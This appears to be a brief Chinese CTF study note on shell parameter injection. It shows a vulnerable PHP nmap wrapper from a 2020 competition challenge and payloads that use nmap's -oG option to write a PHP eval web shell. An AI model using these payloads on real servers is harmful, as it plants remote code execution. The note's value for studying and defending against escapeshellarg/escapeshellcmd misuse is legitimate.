参数注入
参考资料
https://www.leavesongs.com/PENETRATION/escapeshellarg-and-parameter-injection.html
https://www.anquanke.com/post/id/107336
https://paper.seebug.org/164/
nmap参数注入
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| <?php
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
if(!isset($_GET['host'])) {
highlight_file(__FILE__);
} else {
$host = $_GET['host'];
$host = escapeshellarg($host);
$host = escapeshellcmd($host);
$sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
echo 'you are in sandbox '.$sandbox;
@mkdir($sandbox);
chdir($sandbox);
echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}
?>
|
-oG参数:
payload: ?host=' <?php @eval($_POST["hack"]);?> -oG shell.php '
nmap -T5 -sT -Pn --host-timeout 2 -F <?php @eval($_POST["hack"]);?> -oG shell.php
[网鼎杯 2020 朱雀组]Nmap
payload ' <?=eval($_POST["hack"]);?> -oG shell.phtml '